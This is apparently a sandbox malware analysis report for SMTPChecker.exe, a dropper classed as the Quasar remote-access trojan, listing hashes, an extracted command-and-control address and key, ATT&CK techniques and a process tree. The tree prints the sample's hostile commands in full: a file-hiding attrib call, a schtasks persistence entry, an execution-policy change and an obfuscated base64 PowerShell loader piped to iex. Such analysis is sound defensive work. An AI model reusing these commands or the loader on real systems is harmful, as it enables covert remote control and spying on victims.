quasar | eabb7c5d04a447b6af835c375f9e5535fa1250f5ae976686048bf4bc9766612f

Analysis

max time kernel
149s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2024 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SMTPChecker.exe
Size

23.1MB
MD5

b2d4138a7cbb8b3e02d9f61c76f31f18
SHA1

629dfd6d138fe6a9ff0492a63ef1ce0bd5356c6c
SHA256

eabb7c5d04a447b6af835c375f9e5535fa1250f5ae976686048bf4bc9766612f
SHA512

f9cc089193c91f603f0ed6f47f84fa7483344268a88b2bfdaa8914e5e9f07af84ab206bd621272718eaca8a3babdceeaf58cd25197b24adfc0cede6f3933c988
SSDEEP

393216:ZSzcigXdH1z88oOJOVyRzVOrRS1/Q1NeJ42Mjck4GREfMfoPwY74HpC1P5aw:mVgc8hJO4wK/EdcsEfQobeM6

Score

10^/10

quasar office defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

45.200.149.95:6669

Mutex

6HcAGCOypVIi6hl6rR

Attributes

encryption_key
3Fmq36RtzQkpmjAWxAFM
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
DISC
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/116-128-0x0000000000400000-0x000000000044E000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

18 1812 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

checkerdali.exe

pid process

5028 checkerdali.exe

flow	pid	process
18	1812	powershell.exe

Loads dropped DLL 19 IoCs

Processes:

checkerdali.exe

pid	process
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe
5028	checkerdali.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1356 powershell.exe
1812 powershell.exe
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 ifconfig.me
15 ifconfig.me
22 ip-api.com
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

3952 cmd.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

SMTPChecker.exe

pid process

4644 SMTPChecker.exe
4644 SMTPChecker.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1812 set thread context of 116 1812 powershell.exe installutil.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3356 1812 WerFault.exe powershell.exe

pid	process
1356	powershell.exe
1812	powershell.exe

flow	ioc
14	ifconfig.me
15	ifconfig.me
22	ip-api.com

pid	process
3952	cmd.exe

pid	process
4644	SMTPChecker.exe
4644	SMTPChecker.exe

description	pid	process	target process
PID 1812 set thread context of 116	1812	powershell.exe	installutil.exe

pid	pid_target	process	target process
3356	1812	WerFault.exe	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exeinstallutil.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installutil.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3352 schtasks.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

SMTPChecker.exepowershell.exepowershell.exe

pid process

4644 SMTPChecker.exe
4644 SMTPChecker.exe
1356 powershell.exe
1356 powershell.exe
1356 powershell.exe
1812 powershell.exe
1812 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeinstallutil.exe

description pid process

Token: SeDebugPrivilege 1356 powershell.exe
Token: SeDebugPrivilege 1812 powershell.exe
Token: SeDebugPrivilege 116 installutil.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

installutil.exe

pid process

116 installutil.exe

pid	process
3352	schtasks.exe

pid	process
4644	SMTPChecker.exe
4644	SMTPChecker.exe
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe
1812	powershell.exe
1812	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	116	installutil.exe

pid	process
116	installutil.exe

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

SMTPChecker.execheckerdali.execmd.execmd.execmd.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 4644 wrote to memory of 5028	4644	SMTPChecker.exe	checkerdali.exe
PID 4644 wrote to memory of 5028	4644	SMTPChecker.exe	checkerdali.exe
PID 5028 wrote to memory of 3952	5028	checkerdali.exe	cmd.exe
PID 5028 wrote to memory of 3952	5028	checkerdali.exe	cmd.exe
PID 3952 wrote to memory of 1492	3952	cmd.exe	attrib.exe
PID 3952 wrote to memory of 1492	3952	cmd.exe	attrib.exe
PID 5028 wrote to memory of 2672	5028	checkerdali.exe	cmd.exe
PID 5028 wrote to memory of 2672	5028	checkerdali.exe	cmd.exe
PID 2672 wrote to memory of 3352	2672	cmd.exe	schtasks.exe
PID 2672 wrote to memory of 3352	2672	cmd.exe	schtasks.exe
PID 5028 wrote to memory of 4264	5028	checkerdali.exe	cmd.exe
PID 5028 wrote to memory of 4264	5028	checkerdali.exe	cmd.exe
PID 5028 wrote to memory of 4408	5028	checkerdali.exe	cmd.exe
PID 5028 wrote to memory of 4408	5028	checkerdali.exe	cmd.exe
PID 4264 wrote to memory of 4212	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 4212	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 1356	4264	cmd.exe	powershell.exe
PID 4264 wrote to memory of 1356	4264	cmd.exe	powershell.exe
PID 4408 wrote to memory of 1812	4408	cmd.exe	powershell.exe
PID 4408 wrote to memory of 1812	4408	cmd.exe	powershell.exe
PID 4408 wrote to memory of 1812	4408	cmd.exe	powershell.exe
PID 1812 wrote to memory of 4972	1812	powershell.exe	csc.exe
PID 1812 wrote to memory of 4972	1812	powershell.exe	csc.exe
PID 1812 wrote to memory of 4972	1812	powershell.exe	csc.exe
PID 4972 wrote to memory of 4128	4972	csc.exe	cvtres.exe
PID 4972 wrote to memory of 4128	4972	csc.exe	cvtres.exe
PID 4972 wrote to memory of 4128	4972	csc.exe	cvtres.exe
PID 1812 wrote to memory of 3560	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 3560	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 3560	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe
PID 1812 wrote to memory of 116	1812	powershell.exe	installutil.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1492 attrib.exe

pid	process
1492	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SMTPChecker.exe
"C:\Users\Admin\AppData\Local\Temp\SMTPChecker.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4644
- C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\checkerdali.exe
  C:\Users\Admin\AppData\Local\Temp\SMTPChecker.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"
      4⤵
      Views/modifies file attributes
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4264
  - - C:\Windows\system32\cmd.exe
      cmd /C echo Y
      4⤵
      PID:4212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBJect iO.ComPreSsION.DeFLATestrEAm( [Io.mEmOryStreAm] [SYstem.CoNVeRt]::FRoMBASE64stRiNG('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') , [sYstEm.iO.coMPREssIOn.cOmPREssioNMoDE]::dEComprEss) | FoReach { NEW-oBJect iO.sTrEAMREaDEr($_, [teXt.EnCoDInG]::AScII)} ).rEadtoEnd( ) | &( $Env:Comspec[4,15,25]-Join'')""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBJect iO.ComPreSsION.DeFLATestrEAm( [Io.mEmOryStreAm] [SYstem.CoNVeRt]::FRoMBASE64stRiNG('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') , [sYstEm.iO.coMPREssIOn.cOmPREssioNMoDE]::dEComprEss) | FoReach { NEW-oBJect iO.sTrEAMREaDEr($_, [teXt.EnCoDInG]::AScII)} ).rEadtoEnd( ) | &( $Env:Comspec[4,15,25]-Join'')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1812
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lyjr0cys\lyjr0cys.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4972
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F3D.tmp" "c:\Users\Admin\AppData\Local\Temp\lyjr0cys\CSCF57DA6A5D32047B1B5A1AE825CBEF5B.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4128
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        5⤵
        
        PID:3560
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 2552
        5⤵
        Program crash
        
        PID:3356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 1812 -ip 1812
1⤵
PID:3080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
367b1c81198bfdcdba813c2c336627a3

SHA1
37fe6414eafaaed4abb91c1aafde62c5b688b711

SHA256
1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

SHA512
e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
63KB

MD5
f495d1897a1b52a2b15c20dcecb84b47

SHA1
8cb65590a8815bda58c86613b6386b5982d9ec3f

SHA256
e47e76d70d508b62924fe480f30e615b12fdd7745c0aac68a2cddabd07b692ae

SHA512
725d408892887bebd5bcf040a0ecc6a4e4b608815b9dea5b6f7b95c812715f82079896df33b0830c9f787ffe149b8182e529bb1f78aadd89df264cf8853ee4c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

Filesize
81KB

MD5
899380b2d48df53414b974e11bb711e3

SHA1
f1d11f7e970a7cd476e739243f8f197fcb3ad590

SHA256
b38e66e6ee413e5955ef03d619cadd40fca8be035b43093d2342b6f3739e883e

SHA512
7426ca5e7a404b9628e2966dae544f3e8310c697145567b361825dc0b5c6cd87f2caf567def8cd19e73d68643f2f38c08ff4ff0bb0a459c853f241b8fdf40024

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

Filesize
173KB

MD5
9b4e74fd1de0f8a197e4aa1e16749186

SHA1
833179b49eb27c9474b5189f59ed7ecf0e6dc9ea

SHA256
a4ce52a9e0daddbbe7a539d1a7eda787494f2173ddcc92a3faf43b7cf597452b

SHA512
ae72b39cb47a859d07a1ee3e73de655678fe809c5c17ffd90797b5985924ddb47ceb5ebe896e50216fb445526c4cbb95e276e5f3810035b50e4604363eb61cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

Filesize
285KB

MD5
d3e74c9d33719c8ab162baa4ae743b27

SHA1
ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b

SHA256
7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92

SHA512
e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

Filesize
771KB

MD5
bfc834bb2310ddf01be9ad9cff7c2a41

SHA1
fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c

SHA256
41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1

SHA512
6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9F3D.tmp

Filesize
1KB

MD5
1b06b6f4d9c7694de965719e5044fb2b

SHA1
d27362cf8fd1537460349b72317f7c07ddd3814f

SHA256
6fe94ea62b48f5d171f3db3bb7955b6efe5f7741eb7383b917191e2807afb26d

SHA512
624335df762873fcc60292ec735e96641ae35e5cac3ef9e1502eda15cefd09afcb59af3e496866452f73d1067aa97887d9f3961341c4263af1cf983e0f60ebbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xsv5hwo.lpa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lyjr0cys\lyjr0cys.dll

Filesize
7KB

MD5
befec93432c2751ade439d8f9864b40e

SHA1
bf81a0f47275e3b9592ff8248d4907673e78b084

SHA256
994ab5c246e9643d14ab3c7562c48d53f6eb56798ecdb501797ff7478dfe7c85

SHA512
